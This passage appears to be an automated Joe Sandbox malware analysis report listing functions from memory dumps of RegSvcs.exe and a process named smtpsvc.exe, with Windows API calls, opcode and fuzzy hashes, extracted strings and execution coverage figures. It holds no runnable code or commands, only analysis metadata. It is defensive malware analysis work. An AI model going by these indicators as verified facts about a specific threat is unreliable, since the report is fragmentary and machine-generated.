Opcode ID: 3406eef756d5ad4203ecb55760acf86b882c301831901eb05f931e6d2b7e6d1d
Instruction ID: ffbacab31ca41bb88f8d1a4b9d4f68447ddf067b560c9809b05afe6ea984fdae
Opcode Fuzzy Hash: 3406eef756d5ad4203ecb55760acf86b882c301831901eb05f931e6d2b7e6d1d
Instruction Fuzzy Hash: D1110471504340AFE310CB15DC41F66BFF8EF85620F0485AAED489B642D275F915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BA4DE, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,9228A765,00000000,00000000,00000000,00000000), ref: 001BA53D

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d15460c312bdeb53abb8516eaa91e7df846f91a8e9c0a39f4be21b41854ba905
Instruction ID: f5d57b87ca4d274070aadbe208af1b93dd9f5308cc2779e43ffee6be322707bf
Opcode Fuzzy Hash: d15460c312bdeb53abb8516eaa91e7df846f91a8e9c0a39f4be21b41854ba905
Instruction Fuzzy Hash: 0C11C172400300EFFB21CF55DC84FAAFBE8EF44320F1485AAE9499A141D774EA449BB2

Uniqueness

Uniqueness Score: -1.00%

Function 001BA2A3, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 001BA2FC

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: cd7dd626679dd896f7412a2e8e6114beba2a3eb824789c4f9c8604bcabc0a39a
Instruction ID: 45dfac69364e969cd05c3fec370b8901c16c02acdb7ba4e21d3bdb8fdc5846c0
Opcode Fuzzy Hash: cd7dd626679dd896f7412a2e8e6114beba2a3eb824789c4f9c8604bcabc0a39a
Instruction Fuzzy Hash: 9B11A0715093C09FD7128B25DC85B96BFF4EF06220F0984DAED858B263D375A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001BA5EA, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 001BA63A

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 6911f0f1ad6a506b53f6d0285347ee72d1453da131eea931e10a412fd049b69d
Instruction ID: 82833b3bb0ab56d2f7507ee1320ff0c6cf77cb5dca97362e04022033131c2397
Opcode Fuzzy Hash: 6911f0f1ad6a506b53f6d0285347ee72d1453da131eea931e10a412fd049b69d
Instruction Fuzzy Hash: AC01B171900200AFE310CF16DD41B26FBE8FB84A20F14812AED088B741D275F515CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 001BA2CA, Relevance: 1.5, APIs: 1, Instructions: 39
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 001BA2FC

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 75cf3f4b8b24c509db5b696ab1879d3211fe5d46b58ef439b96d46d4b6ffb9e5
Instruction ID: 57558352a879e440e7c1b6fc84b4e0a47f85a4da4a370d15ef89ea89f1eacb12
Opcode Fuzzy Hash: 75cf3f4b8b24c509db5b696ab1879d3211fe5d46b58ef439b96d46d4b6ffb9e5
Instruction Fuzzy Hash: 1601F4355003408FEB108F19D9897A9FBE4EF04320F48C0EADD098B752D375E848DA62

Uniqueness

Uniqueness Score: -1.00%

Function 001BA23A, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 001BA269

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: a168cf5e336164df14ba73e149fed9cd417a8d61a9b2ebb2a3a24885da4e2ba3
Instruction ID: cee7dcb651e348a2b44aaa39ad59f86a37310d66eeb5ac36fae4e5144390c6a5
Opcode Fuzzy Hash: a168cf5e336164df14ba73e149fed9cd417a8d61a9b2ebb2a3a24885da4e2ba3
Instruction Fuzzy Hash: 33F0CD359043408FEB10CF09D8897A5FFE0EF00720F48C0EADD094B342D37AA944DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 003C1150, Relevance: 1.5, Strings: 1, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 003C1386

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: a73dc0a837eb7e765a00658049cbfbcb8d547ba986ce1259413a6db6f55aa983
Instruction ID: 9b42d8ea780257dd36e67293b349e06966e843034f4547acabe14aad6cb33056
Opcode Fuzzy Hash: a73dc0a837eb7e765a00658049cbfbcb8d547ba986ce1259413a6db6f55aa983
Instruction Fuzzy Hash: E4816C34B006018FEB19EB69C454B6EB7F7AFC8300F298469E409DB7A5CA35DC45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003C00E8, Relevance: 1.4, Strings: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 003C029B

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 5865fdc634bdef049e14a390b8fc8c2ac6457fe5390b5f8827b0988646522954
Instruction ID: 18f589e86e96cb57256aa37b0311ec9a339c1e23d515884bf026bb85c0a0a56a
Opcode Fuzzy Hash: 5865fdc634bdef049e14a390b8fc8c2ac6457fe5390b5f8827b0988646522954
Instruction Fuzzy Hash: 56717C30A01241CFD709EB78D458F697BE3BB88341F1A8068E406DBBA5DB76DD85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003C1140, Relevance: 1.4, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 003C1386

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 90d6401e74bd2e18bece9f4c3875859b940c75b731ee2dfa7787216c2e763748
Instruction ID: b910f1b12e07c04d0a706b86dcf476fb7173f3ce9805a8e0b24ff694f495a30a
Opcode Fuzzy Hash: 90d6401e74bd2e18bece9f4c3875859b940c75b731ee2dfa7787216c2e763748
Instruction Fuzzy Hash: AC617D34B002028FEB09EB69C454B6EB7F6EF85300F298069E505DB7A5CB35DC45EB61

Uniqueness

Uniqueness Score: -1.00%

Function 003C06B9, Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D9Vq, xrefs: 003C0796

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 7548d968f7aec340bc9741ea5a6a8452f27b9372922d8cb5a604bd1a9699ea23
Instruction ID: 7409c784f8fbe7b4cc0cd4401bbd698628fca1f0178d189e095d0b88db44a801
Opcode Fuzzy Hash: 7548d968f7aec340bc9741ea5a6a8452f27b9372922d8cb5a604bd1a9699ea23
Instruction Fuzzy Hash: D5314D307012528FDB5E6B74C028B6D37E2AF95705B1508BDD406CB7A2EE3ACC468781

Uniqueness

Uniqueness Score: -1.00%

Function 003C06C8, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D9Vq, xrefs: 003C0796

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 53c4e1ead08e16db1426f010f223eeebfd00a554a01cd3f603475a12f0579cc9
Instruction ID: 5b22e9aee8610b4ae9fcf4dbff689ed346e337141c922d4e7c7c364732ae99fa
Opcode Fuzzy Hash: 53c4e1ead08e16db1426f010f223eeebfd00a554a01cd3f603475a12f0579cc9
Instruction Fuzzy Hash: 78212B303012128FDB5D6B78C028B6D36E2AFD5711B1504BDE41ACF7A5EE3ADC469B81

Uniqueness

Uniqueness Score: -1.00%

Function 001BA336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001BA39C

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2b57aaeeb1e099d6e10166685f8091eb925c436a065ad73b07ec02c588a6203a
Instruction ID: 2406a6bb5f1972037e76e5a2ea6455790ef924d2d0337337cc8fdca7a405778b
Opcode Fuzzy Hash: 2b57aaeeb1e099d6e10166685f8091eb925c436a065ad73b07ec02c588a6203a
Instruction Fuzzy Hash: 38216D755093C09FE7128B25DC55B96BFB4EF02220F0984EBDD85CF163D279A848DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001BA36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001BA39C

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e8f278af372e962e96dece5abd70829a511fcef323eb8ad93b6a4dbc547cce02
Instruction ID: 6c69907fdbca3851c23bd2476fce8197a9b8eb5715e3df2bf6d315a7b466d576
Opcode Fuzzy Hash: e8f278af372e962e96dece5abd70829a511fcef323eb8ad93b6a4dbc547cce02
Instruction Fuzzy Hash: 6901F235501340CFEB10CF19D8887A9FBE4EF00320F08C0AADC098B252D774E844DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0060019A, Relevance: .8, Instructions: 847COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.434003125.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_600000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa29b189e545f73e0f4674b6d07269dad1d355094c618898e4555531f2931173
Instruction ID: 915c627f841c1af8a14ab4fa05bf27bde51b120daa26825ea8ec5c38e5be02f5
Opcode Fuzzy Hash: aa29b189e545f73e0f4674b6d07269dad1d355094c618898e4555531f2931173
Instruction Fuzzy Hash: AB41037154E3C09FD7138B349C61652BFB4AF47220B1E88DBE484CF5A3D22D681ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 003C0F47, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3b9de02356ab1d8c7ced9b47ddaa0a7c243b497bbb01755943cb17332bd163
Instruction ID: b62209ce3954b8f7a1002c537ac799b69f4a8c02d40a758facde13e2a4891ddf
Opcode Fuzzy Hash: fb3b9de02356ab1d8c7ced9b47ddaa0a7c243b497bbb01755943cb17332bd163
Instruction Fuzzy Hash: 1B213731B093948FCB0AA7759820ADD7FB5AFC2604B1940EFC045DB792CB349D0AD7A2

Uniqueness

Uniqueness Score: -1.00%

Function 006007F7, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.434003125.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_600000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead0c0d4f4e564350d91c2c796f2e427fbccc5c6d9bda806a15f4df07b05d16c
Instruction ID: 854cfd4273f18b6b69de431f76d1b0464ee3b877ff16a8c811b1e0f707cb7900
Opcode Fuzzy Hash: ead0c0d4f4e564350d91c2c796f2e427fbccc5c6d9bda806a15f4df07b05d16c
Instruction Fuzzy Hash: 5401D6725493806FE7128B05AC41863FFB8DB86630709C4DFEC498B652D125B809CB72

Uniqueness

Uniqueness Score: -1.00%

Function 003C1030, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90694b7ff3dca03d55eee13d071d19570c707394ad8c65c194c98ae43dfb832f
Instruction ID: bf0e57eec9046b8bbf0c5f46edbf76a13699a3c8b9e63e2cf4ddd534afe33833
Opcode Fuzzy Hash: 90694b7ff3dca03d55eee13d071d19570c707394ad8c65c194c98ae43dfb832f
Instruction Fuzzy Hash: 99F059313443912FD32656769C10F573B99AFC3B60F16406AF605CB183CA61DC4193A0

Uniqueness

Uniqueness Score: -1.00%

Function 003C1040, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b0b3764382c84c232601b134184dcf896f9358ae9cd5119b60986922e8edec3
Instruction ID: f19d272f78aa7cba7428228657a154b62f03502396102bcc45ea519a3391bf42
Opcode Fuzzy Hash: 6b0b3764382c84c232601b134184dcf896f9358ae9cd5119b60986922e8edec3
Instruction Fuzzy Hash: 46F0E9363001219BD714A6BA9C01FAB77DDEBC9B60F15446AF609CB282DE71DC4193D0

Uniqueness

Uniqueness Score: -1.00%

Function 003C0EF0, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd9908f9d9ac14d0363f32ccf574ec7d9a0eeca768d5d5c63dc0993e69257bb
Instruction ID: 32b39f04ec9fce296b3043d1dcb1fed3da46b5ed6f60b4743f3d408c1f5da5a9
Opcode Fuzzy Hash: ddd9908f9d9ac14d0363f32ccf574ec7d9a0eeca768d5d5c63dc0993e69257bb
Instruction Fuzzy Hash: 4DF0EC303001508FC304EB7CE868CCA3BEAEB8A22570548A7E408C7336CA20EC4ECB91

Uniqueness

Uniqueness Score: -1.00%

Function 003C0099, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149d2715ac08e69f5993259c0070a37ab6e60db3f204feda0eac39302bf08a82
Instruction ID: 2bfb7953977e1c010af4867120855b62b990cbe1633b2fad96df7b5dc42d3c7a
Opcode Fuzzy Hash: 149d2715ac08e69f5993259c0070a37ab6e60db3f204feda0eac39302bf08a82
Instruction Fuzzy Hash: 2CF08C71D013599F8F40DFBCD8819DEBFF8EB49350B20046AD508E3202E7315A0ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003C10A0, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00eeb87be3434cb1b0d14b31925cf6d7247b4ac859c4ef9cf00b559db6310e0d
Instruction ID: 9901f62e3ded23c73b58a235bd4bde364007698671473367fbf7eaf5b882acca
Opcode Fuzzy Hash: 00eeb87be3434cb1b0d14b31925cf6d7247b4ac859c4ef9cf00b559db6310e0d
Instruction Fuzzy Hash: 7BF01CB1E0121A9FCB40DFBADC41A9BBFB8FB45650F10856AD118E3641E235A6158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.434003125.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_600000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d406c69c1c3e0593d4a12b6c7c96b49fefbeda54bb11884cb9ffdb58bff67a
Instruction ID: b3fcf9b4dd56b7c000d4663b33ea61d02e628d2e449293d325e6b8b4e70dc556
Opcode Fuzzy Hash: c6d406c69c1c3e0593d4a12b6c7c96b49fefbeda54bb11884cb9ffdb58bff67a
Instruction Fuzzy Hash: E8E092766017008BE650CF0AFC81452F7E4EB84A30B08C07FDC0D8B701E536F505CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 003C00A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de7ed6c10cf68452599d05d77f7155b6d2316a94593998b57ca9978f84252c3
Instruction ID: 58a8fbe8f5f2299517e3967cb98d1553775447915d058bf111a29fcc692e708a
Opcode Fuzzy Hash: 2de7ed6c10cf68452599d05d77f7155b6d2316a94593998b57ca9978f84252c3
Instruction Fuzzy Hash: C6E07EB1E0125E9F8F40EFB99945ADEFFF8EB48250B20446AD619E3200E2315A118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 003C0F00, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f885e0d9ba80f6ea258699e4ca229139e0898a50cf4b5cdb31c3d3c3bc415359
Instruction ID: 6005ffe0795e815817b5b07e51f9d74904715f49d07090c69de89f707900a152
Opcode Fuzzy Hash: f885e0d9ba80f6ea258699e4ca229139e0898a50cf4b5cdb31c3d3c3bc415359
Instruction Fuzzy Hash: 57E01A353004208FC754FBB8E458D9A37EAEB8926571145AAE409C7338DA71EC4EDBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003C10B0, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfd8e2ee44758055bfaf9d802bc218a58e25fea703479f125db1cd38295beba
Instruction ID: 9ac1c05a9519c2255fad01471a2deb8e6f40fd3f671f032d3263f85782010d7c
Opcode Fuzzy Hash: 0cfd8e2ee44758055bfaf9d802bc218a58e25fea703479f125db1cd38295beba
Instruction Fuzzy Hash: F4E0B6B1D012199ECB80EFBA98456DFBFF8EB49250F50457BD108E3201E23596558BE1

Uniqueness

Uniqueness Score: -1.00%

Function 003C0F58, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fce893b77bb021969c69e7849ae3d264c3d49a45bbe1717391c8ba3aefb89f
Instruction ID: 11dcdc22c50f635df8a4a0ce036734227cd667ff0c971e681acda769f76422a6
Opcode Fuzzy Hash: d7fce893b77bb021969c69e7849ae3d264c3d49a45bbe1717391c8ba3aefb89f
Instruction Fuzzy Hash: F6D02E326002048BC314AA74E808ECA3BA8EF01210F0000A8E9008B250CB62EC1487E0

Uniqueness

Uniqueness Score: -1.00%

Function 001B23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433589931.00000000001B2000.00000040.00000001.sdmp, Offset: 001B2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93ad4bd2cd814e00a12ff4eae9ee1eef97e3b50f85f1a4d17461aa53d761273
Instruction ID: 119ac433d1385e45b56e7b019f168e717250ba328ac79502e61bbb6900c5ed7e
Opcode Fuzzy Hash: f93ad4bd2cd814e00a12ff4eae9ee1eef97e3b50f85f1a4d17461aa53d761273
Instruction Fuzzy Hash: 32D05E79304A818FD3168B1CC1A4BD53BD4AF51B05F5644F9E800CBAA3C378D985D200

Uniqueness

Uniqueness Score: -1.00%

Function 001B23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.433589931.00000000001B2000.00000040.00000001.sdmp, Offset: 001B2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c97a51699d4b3d27b72cfda1cee67222116425a526dd1efc62c4456f293336
Instruction ID: c965fd0448d82a79685b374d05c6aaa31c9b1abb958c99db17c130a24942529f
Opcode Fuzzy Hash: e5c97a51699d4b3d27b72cfda1cee67222116425a526dd1efc62c4456f293336
Instruction Fuzzy Hash: ACD05E343006818BD719DB0CC294F9973E4BB44700F0644E8EC108B276C3B8DCC4D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: smtpsvc.exe PID: 2128 Parent PID: 2212 smtpsvc.exeCOMMON

Execution Graph

Execution Coverage:	22.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	64
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004000E8, Relevance: 2.7, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@/q, xrefs: 0040029B
\,4, xrefs: 00400221

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: :@/q$\,4
API String ID: 0-1428155295
Opcode ID: 062d0260eb43b8de37c2b499941733b3f8b79ebebfb9845066241e866fd7fe0d
Instruction ID: 8b15de4ea7596bd5f9f871f9a9480d5bf39cc430c9614be0b31140e00aa0a52d
Opcode Fuzzy Hash: 062d0260eb43b8de37c2b499941733b3f8b79ebebfb9845066241e866fd7fe0d
Instruction Fuzzy Hash: FA71A038B005018FD719EB28D458B6A7BF3BB89344F148469D806EB3A5DF75DD45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004003E2, Relevance: 2.6, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H-Tq, xrefs: 0040044C
H-Tq, xrefs: 0040042F

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: H-Tq$H-Tq
API String ID: 0-1433740457
Opcode ID: 5bcc9563b7cf8562d2c9bec224538f4b0526b4043f48346594dc055b92e94bdd
Instruction ID: 9f66b42c9333bbb8e1e81798b8199edd282e3c04749a3608288f4b3973dc7464
Opcode Fuzzy Hash: 5bcc9563b7cf8562d2c9bec224538f4b0526b4043f48346594dc055b92e94bdd
Instruction Fuzzy Hash: F9414F30A41715CBEB19AF70C5597AE7AB1AF44704F20447AD402BB3E0CF7A8886CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00400F58, Relevance: 2.5, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\,4, xrefs: 00400F8D
\,4, xrefs: 00400F9F

Memory Dump Source

Source File: 00000010.00000002.437703603.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_smtpsvc.jbxd

Similarity

API ID:
String ID: \,4$\,4
API String ID: 0-262534928
Opcode ID: 42ad42b7a68435ed1b8a837889a8752d269a21017aedc5dfcee3156b8b4a3ed2
Instruction ID: 03ad08a55547feb3a65bb53e0541c67b7aa357c179a1d9ebb8abece8833178c9
Opcode Fuzzy Hash: 42ad42b7a68435ed1b8a837889a8752d269a21017aedc5dfcee3156b8b4a3ed2
Instruction Fuzzy Hash: 9201BC30A006549FDB5ADB74C85068E7FF9AF82604F5480EAC405DF791CF78AE468B92

Uniqueness

Uniqueness Score: -1.00%

Function 002AA587, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 002AA63A

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 98ea12f7893248cb121b120db011bd19e4b11b970261f72a81d991d752e518fd
Instruction ID: 8177768468e6c12d743956fe2168003d7113fbf85ef46c089b9a1202ffc3f648
Opcode Fuzzy Hash: 98ea12f7893248cb121b120db011bd19e4b11b970261f72a81d991d752e518fd
Instruction Fuzzy Hash: 8731AE7290E3C15FE313CB219C61B62BFB4EF43214F1A81CBD8848F193D225A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 002AA4AA, Relevance: 1.6, APIs: 1, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,9CCAA513,00000000,00000000,00000000,00000000), ref: 002AA53D

Memory Dump Source

Source File: 00000010.00000002.437599474.00000000002AA000.00000040.00000001.sdmp, Offset: 002AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2aa000_smtpsvc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ca4eb0ccc12f4591ba34078be29468553ff18e3a43377d1316aecdc8521ff16f
Instruction ID: e68b36893d212dbc5b591288d476f4d510cfde3939df32a2dbe567d4bd418914
Opcode Fuzzy Hash: ca4eb0ccc12f4591ba34078be29468553ff18e3a43377d1316aecdc8521ff16f
Instruction Fuzzy Hash: 6121B571409380AFE7228F65DC54F96BFB8EF06310F0885DBE9849F193C225A909DB76

Uniqueness

Uniqueness Score: -1.00%

